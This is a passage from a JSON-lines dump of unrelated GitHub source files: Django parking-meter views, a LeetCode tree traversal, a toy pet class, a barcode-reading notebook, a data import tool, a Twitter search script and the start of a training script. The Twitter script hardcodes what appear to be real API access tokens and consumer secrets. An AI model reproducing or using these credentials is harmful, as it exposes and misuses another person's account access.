JsonView(JSONResponseMixin, TemplateView):\n def render_to_response(self, context, **response_kwargs):\n return self.render_to_json_response(context, **response_kwargs)\n\n\nclass ZonaParqsView(JsonView):\n def get_context_data(self, **kwargs):\n context = {'zonas': []}\n\n for zona in ZonaParquimetro.objects:\n context['zonas'].append({'id': str(zona.pk), 'nombre': zona.nombre})\n\n return context\n\n\nclass PoligonoZonaView(JsonView):\n def get_context_data(self, **kwargs):\n zona_id = self.request.GET.get('zona', '')\n if not zona_id:\n return {}\n try:\n zona = ZonaParquimetro.objects.get(pk=zona_id)\n except DoesNotExist:\n return {}\n\n context = {'puntos': []}\n\n for point in zona.area['coordinates']:\n context['puntos'].append({'latitud': point[1], 'longitud': point[0]})\n\n return context\n\n\nclass PoligonosView(JsonView):\n def get_context_data(self, **kwargs):\n context = {'zonas': []}\n for zona in ZonaParquimetro.objects:\n context['zonas'].append(\n {'points': [{'latitud': point[1], 'longitud': point[0]} for point in zona.area['coordinates']]})\n\n return context\n\n\nclass EquipoZonaView(JsonView):\n def get_context_data(self, **kwargs):\n zona_id = self.request.GET.get('zona', '')\n if not zona_id:\n return {}\n try:\n zona = ZonaParquimetro.objects.get(pk=zona_id)\n except DoesNotExist:\n return {}\n\n context = {'puntos': []}\n\n for point in zona.lista_equipos:\n context['puntos'].append({'latitud': point[1], 'longitud': point[0]})\n\n return context\n\n\nclass PoligonoCoordenadaView(JsonView):\n def get_context_data(self, **kwargs):\n latitud = self.request.GET.get('latitud', '')\n longitud = self.request.GET.get('longitud', '')\n if not longitud or not latitud:\n return {}\n\n latitud, longitud = float(latitud), float(longitud)\n zona_encontrada = None\n context = {}\n\n for zona in ZonaParquimetro.objects:\n poligono = zona.area['coordinates']\n if geometry.point_in_poly(longitud, latitud, poligono) or geometry.point_on_border(longitud, latitud,\n poligono):\n zona_encontrada = zona\n break\n\n if not zona_encontrada:\n return {}\n\n context['zona'] = ({'id': str(zona_encontrada.pk), 'nombre': zona_encontrada.nombre,\n 'equipos': [{'latitud': point[1], 'longitud': point[0]} for point in zona.lista_equipos]})\n\n return context\n\n\nclass ParquimetroMasCercano(JsonView):\n def get_context_data(self, **kwargs):\n latitud = self.request.GET.get('latitud', '')\n longitud = self.request.GET.get('longitud', '')\n if not longitud or not latitud:\n return {}\n\n latitud, longitud = float(latitud), float(longitud)\n\n puntos = []\n for zona in ZonaParquimetro.objects:\n for equipo in zona.lista_equipos:\n puntos.append([equipo[0], equipo[1]])\n puntos = numpy.array(puntos)\n\n nearest = geometry.find_nearest_vector(puntos, [latitud, longitud])\n\n return {'latitud': nearest[1], 'longitud': nearest[0]}\n\n\n","repo_name":"imarban/socialparq","sub_path":"socialparq/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3832,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12538151088","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def postorderTraversal(self, root: Optional[TreeNode]) -> List[int]:\n\n output = []\n\n def dfs(node):\n if not node:\n return\n\n dfs(node.left)\n dfs(node.right)\n output.append(node.val)\n\n dfs(root)\n return output\n\n\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass SolutionStack:\n def postorderTraversal(self, root: Optional[TreeNode]) -> List[int]:\n\n output = deque([])\n\n stack = [root]\n while stack:\n node = stack.pop()\n\n if node:\n stack.append(node.left)\n stack.append(node.right)\n\n output.appendleft(node.val)\n\n return output\n","repo_name":"liaison/LeetCode","sub_path":"python/145_binary_tree_postorder_traversal.py","file_name":"145_binary_tree_postorder_traversal.py","file_ext":"py","file_size_in_byte":1070,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"72"} +{"seq_id":"10977265050","text":"# dog class\nclass Dog:\n all = \"mammals\"\n def __init__(self,name,age):\n self.name = name\n self.age = age\n self.is_hungry = True\n\n def eating(self):\n self.is_hungry = False\n\n # using the pets class to manipulate dog class instances\nclass Pets:\n dogs = []\n \n def __init__(self,dogs):\n self.dogs = dogs\n\ndomestic = [Dog(\"Tom\",6),Dog(\"Fletcher\",7),Dog(\"Larry\",9)]\n\npets = Pets(domestic)\n\nprint(\"I have {} dogs\".format(len(pets.dogs)))\n\nfor dog in pets.dogs:\n dog.eating()\n print(\"{} is {}\".format(dog.name,dog.age))\n\nprint(\"And they're all {},ofcourse.\".format(dog.all))\n\nall_hungry = False\n\nfor dog in pets.dogs:\n if dog.is_hungry:\n all_hungry = True\nif all_hungry:\n print(\"My dogs are hungry.\")\nelse:\n print(\"My dogs are not hungry\")\n\n","repo_name":"zydplatform/OOP_EXERCISE","sub_path":"pets_class.py","file_name":"pets_class.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17282089740","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport numpy as np\nimport math\nimport os\nimport random as rand\nimport matplotlib.pyplot as plt\nimport matplotlib.image as img\nimport cv2\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom PIL import Image\nget_ipython().run_line_magic('matplotlib', 'inline')\n\n\n# In[2]:\n\n\ntrain_img = \"W:/Documents/College/ENEE408A/imgs/sample-barcode4.jpg\"\nimage = cv2.imread(train_img) # Load an image as numpy array\ngreyImage = cv2.imread(train_img, cv2.IMREAD_GRAYSCALE)\nprint(image.shape)\n##for x in range(image.shape[0]):\n## print('{')\n## for y in range(image.shape[1]):\n## if (y < image.shape[1] - 1):\n## print(\"%d,\" % (image[x][y]), end =\" \")\n## else:\n## print(\"%d},\"% (image[x][y]), end =\" \")\nplt.gray()\nplt.imshow(image)\n\n\n# In[136]:\n\n\ndef thresholdImg():\n for x in range(0, image.shape[0]):\n for y in range(0, image.shape[1]):\n if (image[x][y] < 180):\n image[x][y] = 0;\n else:\n image[x][y] = 255;\n \n#thresholdImg()\nplt.gray()\nplt.imshow(image)\n\ndef eq(slope, y, centerX, centerY):\n return int((slope * (y - centerY)) + centerX)\n\ncenter = [int(image.shape[0] / 2), int(image.shape[1] / 2)]\nprint(center)\nfor theta in range(0, 180, 2):\n for y in range(0, image.shape[1]):\n ##print(eq(math.sin(math.radians(theta)), x, center[0], center[1]))\n newX = eq(math.sin(math.radians(theta)) / math.cos(math.radians(theta)), y, center[0], center[1])\n if (newX < image.shape[0] and newX >= 0 and y < image.shape[1] / 20):\n if (theta < 60):\n image[newX][y][0] = 255\n image[newX][y][1] = 0\n image[newX][y][2] = 0\n elif (theta < 120):\n image[newX][y][0] = 0\n image[newX][y][1] = 255\n image[newX][y][2] = 0\n elif (theta <= 180):\n image[newX][y][0] = 0\n image[newX][y][1] = 0\n image[newX][y][2] = 255\n #else:\n #print(\"x: %d, y: %d\" % (x, newY))\n \nplt.gray()\nplt.imshow(image)\n \n\n\n# In[3]:\n\n\ndef thresholdGreyImg(threshold):\n for x in range(0, greyImage.shape[0]):\n for y in range(0, greyImage.shape[1]):\n if (greyImage[x][y] < threshold):\n greyImage[x][y] = 0;\n else:\n greyImage[x][y] = 255;\n \nthresholdGreyImg(195)\nplt.gray()\nplt.imshow(greyImage)\n\ndef eq(slope, y, centerX, centerY):\n return int((slope * (y - centerY)) + centerX)\n\ncenter = [int(image.shape[0] / 2), int(image.shape[1] / 2)]\nedgeX = [image.shape[0], 0]\nedgeY = [image.shape[1], 0]\nprint(center)\n\nfor theta in range(0, 180, 2):\n isWhite = 0\n \n for y in range(0, image.shape[1]):\n ##print(eq(math.sin(math.radians(theta)), x, center[0], center[1]))\n newX = eq(math.sin(math.radians(theta)) / math.cos(math.radians(theta)), y, center[0], center[1])\n if (newX < image.shape[0] and newX >= 0):\n if (greyImage[newX][y] == 255):\n isWhite += 1\n \n if (isWhite >= 35):\n print(\"x: %d, y: %d\" % (newX, y))\n\n if (newX < center[0]):\n if (edgeX[0] > newX):\n edgeX[0] = newX\n else:\n if (edgeX[1] < newX):\n edgeX[1] = newX\n \n if (y < center[1]):\n if (edgeY[0] > y):\n edgeY[0] = y\n else:\n if (edgeY[1] < y):\n edgeY[1] = y\n break\n else:\n isWhite = 0\n\nprint(edgeX)\nprint(edgeY)\nfor y in range(0, (edgeY[1] - 16) - (edgeY[0] + 16)):\n newY = min(y + edgeY[0], image.shape[1] - 1)\n image[int((edgeX[1] - edgeX[0]) / 2)][newY][0] = 255\n image[int((edgeX[1] - edgeX[0]) / 2)][newY][1] = 0\n image[int((edgeX[1] - edgeX[0]) / 2)][newY][2] = 0\n image[int((edgeX[1] - edgeX[0]) / 2) - 1][newY][0] = 255\n image[int((edgeX[1] - edgeX[0]) / 2) - 1][newY][1] = 0\n image[int((edgeX[1] - edgeX[0]) / 2) - 1][newY][2] = 0\n image[int((edgeX[1] - edgeX[0]) / 2) + 1][newY][0] = 255\n image[int((edgeX[1] - edgeX[0]) / 2) + 1][newY][1] = 0\n image[int((edgeX[1] - edgeX[0]) / 2) + 1][newY][2] = 0\nplt.figure() \nplt.gray()\nplt.imshow(image)\n \n\n\n# In[10]:\n\n\ndef thresholdGreyImg(threshold):\n for x in range(0, greyImage.shape[0]):\n for y in range(0, greyImage.shape[1]):\n if (greyImage[x][y] < threshold):\n greyImage[x][y] = 0;\n else:\n greyImage[x][y] = 255;\n\ndef processCode(code1, code2, code3, code4):\n if (code1 == 3 and code2 == 2 and code3 == 1 and code4 == 1):\n return 0\n elif (code1 == 2 and code2 == 2 and code3 == 2 and code4 == 1):\n return 1\n elif (code1 == 2 and code2 == 1 and code3 == 2 and code4 == 2):\n return 2 \n elif (code1 == 1 and code2 == 4 and code3 == 1 and code4 == 1):\n return 3\n elif (code1 == 1 and code2 == 1 and code3 == 3 and code4 == 2):\n return 4\n elif (code1 == 1 and code2 == 2 and code3 == 3 and code4 == 1):\n return 5\n elif (code1 == 1 and code2 == 1 and code3 == 1 and code4 == 4):\n return 6\n elif (code1 == 1 and code2 == 3 and code3 == 1 and code4 == 2):\n return 7\n elif (code1 == 1 and code2 == 2 and code3 == 1 and code4 == 3):\n return 8\n elif (code1 == 3 and code2 == 1 and code3 == 1 and code4 == 2):\n return 9 \n else:\n return -1\n\ndef normalizeBars(maxBars):\n avg = (bars[0] + bars[1] + bars[2]) / 3.0\n diff = 3.0 - avg\n print(\"avg: %f\" % (avg))\n for i in range(0, maxBars):\n bars[i] /= avg\n if (np.round(bars[i]) == 0):\n bars[i] = 0.5\n \n if (i % 4 == 2):\n print(\"%f\" % (bars[i]))\n else:\n print(\"%f\" % (bars[i]), end =\" \")\n #bars[i] = np.round(bars[i] + diff)\n print()\n \n offset = 3\n \n for i in range(0, 12):\n if (i == 6):\n #bars[i * 4 + offset + 0] = np.round(bars[i * 4 + offset + 0])\n #bars[i * 4 + offset +1] = np.round(bars[i * 4 + offset + 1])\n offset += 5\n \n if (np.round(bars[i * 4 + offset]) + np.round(bars[i * 4 + offset + 1]) + np.round(bars[i * 4 + offset + 2]) + np.round(bars[i * 4 + offset + 3]) == 7):\n for n in range(0,4):\n bars[i * 4 + offset + n] = np.round(bars[i * 4 + offset + n])\n elif (np.round(bars[i * 4 + offset] + diff) + np.round(bars[i * 4 + offset + 1] + diff) + np.round(bars[i * 4 + offset + 2] + diff) + np.round(bars[i * 4 + offset + 3] + diff) == 7):\n for n in range(0,4):\n bars[i * 4 + offset + n] = np.round(bars[i * 4 + offset + n] + diff)\n elif (np.round(bars[i * 4 + offset] - diff) + np.round(bars[i * 4 + offset + 1] - diff) + np.round(bars[i * 4 + offset + 2] - diff) + np.round(bars[i * 4 + offset + 3] - diff) == 7):\n for n in range(0,4):\n bars[i * 4 + offset + n] = np.round(bars[i * 4 + offset + n] - diff)\n \n for i in range(0, maxBars):\n bars[i] = np.round(bars[i])\n\n\n# In[11]:\n\n\nthresholdGreyImg(170)\nplt.gray()\nplt.imshow(greyImage)\n\ninit = 0\n#middle = int(greyImage.shape[0] / 2)\nmiddle = int((edgeX[1] - edgeX[0]) / 2)\npixelCount = 0\nbars = np.zeros(greyImage.shape[1])\ncurrBar = 0\n\n#for y in range(0, greyImage.shape[1]):\nfor y in range(edgeY[0], edgeY[1]):\n if (init == 0):\n if (greyImage[middle][y] == 0):\n init = 1\n isBlack = 1\n pixelCount += 1\n else:\n if (greyImage[middle][y] != 0 and isBlack == 1):\n #print(\"y: %d, pixelcount: %d\" % (y, pixelCount))\n bars[currBar] = pixelCount\n currBar += 1\n pixelCount = 0\n isBlack = 0\n elif (greyImage[middle][y] != 255 and isBlack == 0):\n #print(\"y: %d, pixelcount: %d\" % (y, pixelCount))\n bars[currBar] = pixelCount\n currBar += 1\n pixelCount = 0\n isBlack = 1\n \n pixelCount += 1\n\nnormalizeBars(currBar)\n\nfor bar in range(currBar):\n if (bar % 4 == 2):\n print(\"%f\" % (bars[bar]))\n else:\n print(\"%f\" % (bars[bar]), end =\" \")\nprint()\n\ncurrNum = 0\noffset = 3\nresult = \"\"\nerror = 0\n\nfor i in range(0, 12):\n print(\"i: %d, offset: %d\" % (i, offset))\n code = processCode(int(bars[i * 4 + offset]), int(bars[i * 4 + 1 + offset]), int(bars[i * 4 + 2 + offset]),\n int(bars[i * 4 + 3 + offset]))\n print(\"%d %d %d %d, code: %d\" % (int(bars[i * 4 + offset]), int(bars[i * 4 + 1 + offset]), int(bars[i * 4 + 2 + offset]),\n int(bars[i * 4 + 3 + offset]), code))\n currNum += 1\n \n if (code != -1):\n result += chr(48 + code)\n print(\"result: %s\" % (result))\n \n if (currNum == 6):\n offset += 5\n else:\n result += \"?\"\n error = -1\n\n\n# In[29]:\n\n\nthresholdGreyImg(170)\nplt.gray()\nplt.imshow(greyImage)\n\ninit = 0\n#middle = int(greyImage.shape[0] / 2)\nmiddle = int((edgeX[1] - edgeX[0]) / 2)\npixelCount = 0\nbars = np.zeros(greyImage.shape[1])\ncurrBar = 0\n\n#for y in range(0, greyImage.shape[1]):\nfor y in range(edgeY[0], greyImage.shape[1]):\n # Chunk labels:\n # _ _#1#\n # #2#_ _\n \n chunk1 = greyImage[middle][y]\n chunk2 = greyImage[middle - 1][y]\n chunk3 = greyImage[middle - 2][y]\n print(\"%d %d %d\" % (chunk1, chunk2, chunk3))\n weight = (int(chunk1) + int(chunk2) + int(chunk3))\n print(weight)\n \n # keep checking until black is found\n if (init == 0):\n if (weight < 256):\n init = 1\n isBlack = 1\n pixelCount += 1\n else:\n if (chunk1 == chunk2): \n if (chunk1 != 0 and isBlack == 1):\n #print(\"y: %d, pixelcount: %d\" % (y, pixelCount))\n bars[currBar] = pixelCount\n currBar += 1\n pixelCount = 0\n isBlack = 0\n elif (chunk1 != 255 and isBlack == 0):\n #print(\"y: %d, pixelcount: %d\" % (y, pixelCount))\n bars[currBar] = pixelCount\n currBar += 1\n pixelCount = 0\n isBlack = 1\n pixelCount += 1\n\nnormalizeBars(currBar)\n\nfor bar in range(currBar):\n if (bar % 4 == 2):\n print(\"%f\" % (bars[bar]))\n else:\n print(\"%f\" % (bars[bar]), end =\" \")\nprint()\n\ncurrNum = 0\noffset = 3\nresult = \"\"\nerror = 0\n\nfor i in range(0, 12):\n print(\"i: %d, offset: %d\" % (i, offset))\n code = processCode(int(bars[i * 4 + offset]), int(bars[i * 4 + 1 + offset]), int(bars[i * 4 + 2 + offset]),\n int(bars[i * 4 + 3 + offset]))\n print(\"%d %d %d %d, code: %d\" % (int(bars[i * 4 + offset]), int(bars[i * 4 + 1 + offset]), int(bars[i * 4 + 2 + offset]),\n int(bars[i * 4 + 3 + offset]), code))\n currNum += 1\n \n if (code != -1):\n result += chr(48 + code)\n print(\"result: %s\" % (result))\n \n if (currNum == 6):\n offset += 5\n else:\n result += \"?\"\n error = -1\n print(\"result: %s\" % (result))\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"just32/408A_Barcode_Scanner","sub_path":"ScannerSTMCode/ScannerPythonCode/scanner.py","file_name":"scanner.py","file_ext":"py","file_size_in_byte":11443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31598988061","text":"# -*- coding:utf-8 -*-\n\n__all__ = ['Importer']\n\nimport sys, os,threading,json,math,traceback,gc,time\nimport requests,xlrd,pymysql\nfrom requests_toolbelt import MultipartEncoder\nfrom pymysql.cursors import DictCursor\n\nfrom lib.Base import Base\n\nclass Importer(Base):\n rootPath = os.path.dirname(os.path.realpath(sys.argv[0]))\n tmpPath = rootPath + '/tmp'\n\n exportPath = tmpPath + '/export-data/page-{page}.csv'\n\n dataInfoDir = tmpPath + '/import-info'\n dataInfoPath = dataInfoDir + '/page-{page}.json'\n taskInfoPath = dataInfoDir + '/task.json'\n\n errorPath = dataInfoDir + '/error.json'\n errorLogPath = dataInfoDir + '/error.log'\n\n threadList = []\n cfg = {}\n\n def __init__(self, inited=True):\n super().__init__(inited)\n\n def parent(self):\n return super()\n \n def init(self):\n super().init()\n\n try:\n if not os.path.exists(self.dataInfoDir):\n os.mkdir(self.dataInfoDir)\n except:\n traceback.print_exc()\n self.log('Can not create [/import-info] path.', ['exit', None])\n\n def loadConfig(self):\n super().loadConfig()\n self.cfg = self.config['Import'] if self.config else None\n \n #extract\n if self.cfg and self.cfg[self.cfg['extractSection']]:\n for k, v in self.cfg[self.cfg['extractSection']].items():\n self.cfg[k] = v\n\n return self.cfg\n\n def stopTask(self):\n self.taskStatus = -1\n gc.collect()\n\n def runTask(self, resumeRun=False, loopRun=False):\n self.loadConfig()\n \n if not resumeRun:\n self.log('Start clearing import info dir...')\n self.clearDir(self.dataInfoDir)\n\n gc.collect()\n self.threadList.clear()\n self.threadLock = threading.Semaphore(self.cfg['maxThreadNum'])\n self.taskStatus = 1\n self.taskFinished = -1 if self.isLoopTask() else 0\n\n totalPage = self.getTotalPage()\n \n self.log('Start running import task...')\n #init\n for i in range(1, totalPage + 1):\n #print('page-%d' % i)\n if not self.isLoopTask() and os.path.exists(self.dataInfoPath.format(page=i)):\n self.taskFinished += 1\n elif self.isLoopTask() and i <= self.getTaskInfo()['page']:\n self.taskFinished += 1\n else:\n t = threading.Thread(target=self.importData,args=(i, None))\n self.threadList.append(t)\n \n #start thread\n for v in self.threadList:\n k = v._args[0]\n if self.taskStatus < 0:\n self.log('Thread import-%d has been interrupted without starting' % k)\n break\n\n self.threadLock.acquire()\n v.start()\n self.log('Thread import-%d has started' % k, ['progress', self.getProgress('progress')])\n\n self.log('All %d threads have started' % len(self.threadList))\n\n for k, v in enumerate(self.threadList):\n if self.taskStatus < 0:\n self.log('Thread import-%d has been interrupted without ending' % (k+1))\n break\n\n v.join()\n self.log('Thread import-%d has finished' % (k+1), ['progress', self.getProgress('progress')])\n\n \n if self.taskStatus == 1:\n self.taskStatus = 0\n self.threadList.clear()\n gc.collect()\n\n #loop\n if loopRun and self.taskStatus>=0 and self.taskFinished=0:\n self.runTask(True, True)\n else:\n self.log('Import task has finished', ['end', self.getProgress('end')])\n \n def getFileData(self, path, page):\n data = ''\n if path.endswith('.xlsx'):\n book = xlrd.open_workbook(path)\n table = book.sheet_by_index(0)\n importStartLine = 0\n\n if self.getExportConfig('exportPrefix'):\n importStartLine = 1\n\n for row_num in range(table.nrows):\n if row_num < importStartLine:\n continue\n \n row_values = table.row_values(row_num)\n c = len(row_values)\n for i in range(0, c):\n if row_values[i] == None:\n data += self.cfg['importNullValue']\n else:\n data += '\"%s\"' % self.filterData(self.cfg['importFilterPattern'], row_values[i], 'import')\n \n if i < c-1:\n data += \",\"\n else:\n data += '\\r\\n' if self.isWindows() else '\\n'\n \n with open(self.exportPath.format(page=str(page)), \"wb\") as f:\n f.write(data.encode(self.cfg['importCharset'], 'ignore'))\n\n return data\n else:\n with open(path, \"rb\") as f:\n data = f.read()\n \n #data = '{ \"index\": {\"_id\":\"0058adeea6c9ff1a9509c14c5d047939\"}}\\n{ \"name\":\"上海歌绍企业管理中心\" }\\n{ \"index\": {\"_id\":\"0058aedb3d9d828c16a9424aaa225036\"}}\\n{ \"company_id\": \"0058aedb3d9d828c16a9424aaa225036\", \"company_name\":\"江西省祥和房地产营销有限公司\" }\\n'\n #data = data.encode('utf-8')\n\n return data\n\n def importData(self, page, extra=None):\n if self.taskStatus < 0:\n self.log('Thread import-%d has been interrupted' % page)\n self.threadLock and self.threadLock.release()\n return\n\n #get data\n path = self.exportPath.format(page=str(page))\n if self.getExportConfig('exportType') == 'excel':\n path = path.replace('.csv', '.xlsx')\n \n if not os.path.exists(path):\n self.threadLock and self.threadLock.release()\n self.log('The page %d exported data does not exist' % page)\n return False\n \n data = self.getFileData(path, page)\n \n #empty data\n if not data:\n with open(self.dataInfoPath.format(page=str(page)), \"w\", encoding=\"utf-8\") as f:\n f.write('{\"total\":0,\"error\":0}')\n \n self.taskFinished += 1\n \n self.log('Thread import-%d data is empty' % page)\n self.threadLock and self.threadLock.release()\n return\n \n if self.taskStatus < 0:\n #gc\n del data\n gc.collect()\n\n self.log('Thread import-%d has been interrupted' % page)\n self.threadLock and self.threadLock.release()\n\n return\n\n\n if self.cfg['driver'] == 'mysql':\n self.uploadMysqlData(data, page)\n else:\n self.uploadHttpData(data, page)\n\n #gc\n del data\n gc.collect()\n\n self.threadLock and self.threadLock.release()\n\n return\n\n def uploadMysqlData(self, data, page):\n self.log('Start importing the page %d...' % page)\n \n if isinstance(data, bytes):\n data = data.decode(self.cfg['importCharset'], 'ignore')\n \n lines = data.strip().split('\\n')\n if len(lines)<=0:\n self.log('The page %d has no any lines' % page, ['error', None])\n return False\n\n try:\n db = pymysql.connect(\n host=self.cfg['host'], \n port=self.cfg['port'],\n user=self.cfg['user'], \n password=self.cfg['password'], \n database=self.cfg['database'], \n charset=self.cfg['charset'], \n connect_timeout=self.cfg['connectTimeout']\n )\n cursor = db.cursor(DictCursor)\n\n affected_rows = 0\n for sql in lines:\n affected_rows += cursor.execute(sql)\n \n db.commit()\n db.close()\n \n self.log('The page %d finished, total %d items, error %d items' % (page, affected_rows, 0))\n\n #save data\n try:\n with open(self.dataInfoPath.format(page=str(page)), \"w\", encoding=\"utf-8\") as f:\n f.write('{\"total\":%d,\"error\":%d}' % (affected_rows, 0))\n\n self.taskFinished += 1\n\n self.log('The page %d info has saved successfully' % page, ['update', self.getProgress('progress'), affected_rows, 0])\n except:\n self.log('The page %d info saved failure' % page, ['error', None])\n\n #save task\n if self.isLoopTask():\n if self.saveTaskInfo(page, 0, 0, affected_rows, 0):\n self.deleteTaskInfo(page)\n\n\n #gc\n del db\n del cursor\n gc.collect()\n\n return True\n except Exception as e:\n self.log('The page %d mysql data can not been imported, Error: %s' % (page, e.__str__()), ['error', None])\n return False\n\n\n def uploadHttpData(self, data, page):\n self.log('Start uploading the page %d...' % page)\n\n path = self.exportPath.format(page=str(page))\n headers = json.loads(self.cfg['headers']) if self.cfg['headers'] else {}\n cookies = json.loads(self.cfg['cookies']) if self.cfg['cookies'] else {}\n \n try:\n if self.cfg['method'] == 'post':\n response = requests.post(self.cfg['url'], data=data, timeout=self.cfg['connectTimeout'], headers=headers, cookies=cookies, verify=False)\n else:\n boundary = '----------shiyaxiong1984----------'\n multipart_encoder = MultipartEncoder(fields={'file': (os.path.basename(path), data, 'text/plain')}, boundary=boundary)\n headers['Content-Type'] = multipart_encoder.content_type\n response = requests.post(self.cfg['url'], data=multipart_encoder, timeout=self.cfg['connectTimeout'], headers=headers, cookies=cookies, verify=False)\n except Exception as e:\n response = None\n self.log('The page %d upload failure, HTTP Error: %s' % (page, e.__str__()), ['error', None])\n \n if response == None or response.status_code != 200:\n self.log('The page %d upload failure, Error: %s' % (page, 'None' if response == None else response.text), ['error', None])\n\n return False\n \n #print(response.text)\n try:\n content = json.loads(response.text)\n except Exception as e:\n self.log('The page %d parse json data failure, Error: %s' % (page, e.__str__()), ['error', None])\n\n return False\n\n\n errors = 0\n if 'items' in content.keys():\n if content['errors']:\n for (k, v) in enumerate(content['items']):\n d = v['index']\n if d['status'] not in [200,201]:\n errors += 1\n self.log('The %d-%d upload failure, _id=%s, Error: %s' % (page, k+1, d['_id'], d['error']['reason'] if not self.isEmpty('error', d) else json.dumps(d)), ['error', None])\n\n #save error\n try:\n with open(self.errorPath, \"a+\", encoding=\"utf-8\") as f:\n #f.write(d['_id'] + '\\n')\n f.write(self.getFileContent(path, (k+1) * 2 - 1, 2).strip() + '\\n')\n except:\n self.log('The %d-%d error data saved failure, _id=%s' % (page, k+1, d['_id']), ['error', None])\n \n\n self.log('The page %d finished, succee %d, error %d' % (page, len(content['items']), errors))\n else:\n self.log('The page %d finished, total %d items' % (page, len(content['items'])))\n\n #save data\n try:\n with open(self.dataInfoPath.format(page=str(page)), \"w\", encoding=\"utf-8\") as f:\n f.write('{\"total\":%d,\"error\":%d}' % (len(content['items']), errors))\n\n self.taskFinished += 1\n \n self.log('The page %d info has saved successfully' % page, ['update', self.getProgress('progress'), len(content['items']), errors])\n except:\n self.log('The page %d info saved failure' % page, ['error', None])\n\n #save task\n if self.isLoopTask():\n if self.saveTaskInfo(page, 0, 0, len(content['items']), errors):\n self.deleteTaskInfo(page)\n else:\n self.log('The page %d finished, total %d items, error %d items' % (page, content['success'], content['error']))\n\n #save data\n try:\n with open(self.dataInfoPath.format(page=str(page)), \"w\", encoding=\"utf-8\") as f:\n f.write('{\"total\":%d,\"error\":%d}' % (content['success'], content['error']))\n\n self.taskFinished += 1\n\n self.log('The page %d info has saved successfully' % page, ['update', self.getProgress('progress'), content['success'], content['error']])\n except:\n self.log('The page %d info saved failure' % page, ['error', None])\n\n #save task\n if self.isLoopTask():\n if self.saveTaskInfo(page, 0, 0, content['success'], content['error']):\n self.deleteTaskInfo(page)\n\n\n #gc\n del content\n del response\n\n return True\n\n \n","repo_name":"pipibear/synczer","sub_path":"lib/Importer.py","file_name":"Importer.py","file_ext":"py","file_size_in_byte":13610,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"34963672242","text":"\r\nimport tweepy\r\nimport numpy as np\r\nimport os\r\naccess_token = '1185203655705653249-MI55LF0YDXJHU06sATMMQtHjfWrkKF' # access details of tweet\r\naccess_token_secret = '9PCjIq70gj0o8zHgrtkvr1K6vlTo5H2P1TyQcfOqyh7B3'\r\nconsumer_key = 'kkEHLGQM2iRKAIRzh33eAQ2RN'\r\nconsumer_secret = 'pNa2PFNYUVWSnUPYuXaFPybExsl3ABY1oLHBkPTtY1AZIJpFd7'\r\nauth = tweepy.OAuthHandler(consumer_key, consumer_secret)\r\nauth.set_access_token(access_token, access_token_secret)\r\n\r\napi = tweepy.API(auth, wait_on_rate_limit=True, wait_on_rate_limit_notify=True)\r\n#api = tweepy.API(auth)\r\nt_list = []\r\ncredentials = {}\r\ncount = 0\r\n\r\nfor tweet in tweepy.Cursor(api.search, q=\"airfrance \", lang=\"en\").items(40):\r\n credentials['text'] = tweet.text\r\n\r\n Time = tweet.created_at\r\n print(Time)\r\n Time = int(Time.strftime(\"%Y%m%d%H%M%S\"))\r\n t_list.append(Time)\r\n ad = tweet.id\r\n count+=1\r\n\r\ni=0\r\nct=0\r\nx = []\r\ny = []\r\nwhile(i < count):\r\n str1 = str(t_list[i])\r\n str2 = str1[6:8]\r\n print(str2)\r\n if(i==0):\r\n x.append(str2)\r\n for a in range(len(x)):\r\n if(a == str2):\r\n ct+=1\r\n break\r\n else:\r\n ct = 0\r\n x.append(str2)\r\n ct+=1\r\n break\r\n i +=1\r\n\r\nprint(x)","repo_name":"DattaDhebe/Rumor-Detection-Project","sub_path":"extract_ids.py","file_name":"extract_ids.py","file_ext":"py","file_size_in_byte":1236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11729607121","text":"from __future__ import print_function\n\nimport sys\nimport argparse\nimport time\nimport math\nimport os\n\nimport torch\nimport torch.backends.cudnn as cudnn\nfrom torch.utils import data\nfrom torchvision import transforms, datasets\nfrom torch.optim import lr_scheduler\n\nfrom util import AverageMeter\nfrom util import adjust_learning_rate, warmup_learning_rate, accuracy\nfrom util import set_optimizer, save_model\nfrom networks.resnet_big import SupConResNet, LinearClassifier\nfrom dataset_loader import Dataset_RAF, Dataset_AffectNet, FERPlus\nfrom sampler import ImbalancedDatasetSampler\n\ntry:\n import apex\n from apex import amp, optimizers\nexcept ImportError:\n pass\n\n\ndef parse_option():\n parser = argparse.ArgumentParser('argument for training')\n\n parser.add_argument('--print_freq', type=int, default=100,\n help='print frequency')\n parser.add_argument('--save_freq', type=int, default=50,\n help='save frequency')\n parser.add_argument('--batch_size', type=int, default=128,\n help='batch_size')\n parser.add_argument('--num_workers', type=int, default=16,\n help='num of workers to use')\n parser.add_argument('--epochs', type=int, default=100,\n help='number of training epochs')\n\n # optimization\n parser.add_argument('--learning_rate', type=float, default=4, help='learning rate')\n parser.add_argument('--lr_decay_epochs', type=str, default='60,75,90',\n help='where to decay lr, can be a list')\n parser.add_argument('--lr_decay_rate', type=float, default=0.2,\n choices=['0.2'], help='decay rate for learning rate')\n parser.add_argument('--weight_decay', type=float, default=0,\n help='weight decay')\n parser.add_argument('--momentum', type=float, default=0.9,\n help='momentum')\n\n # model dataset\n parser.add_argument('--model', type=str, default='resnet18')\n parser.add_argument('--dataset', type=str, default='SFEW',\n choices=['RAF-DB', 'AffectNet', 'SFEW', 'FERPlus', 'CK', 'FED-RO'], help='dataset')\n # RAF-DB setting\n parser.add_argument('--RAF-train-root', type=str, default='/home/gpu/FER/datasets/RAFdataset/train',\n help=\"root path to train data directory\")\n parser.add_argument('--RAF-test-root', type=str, 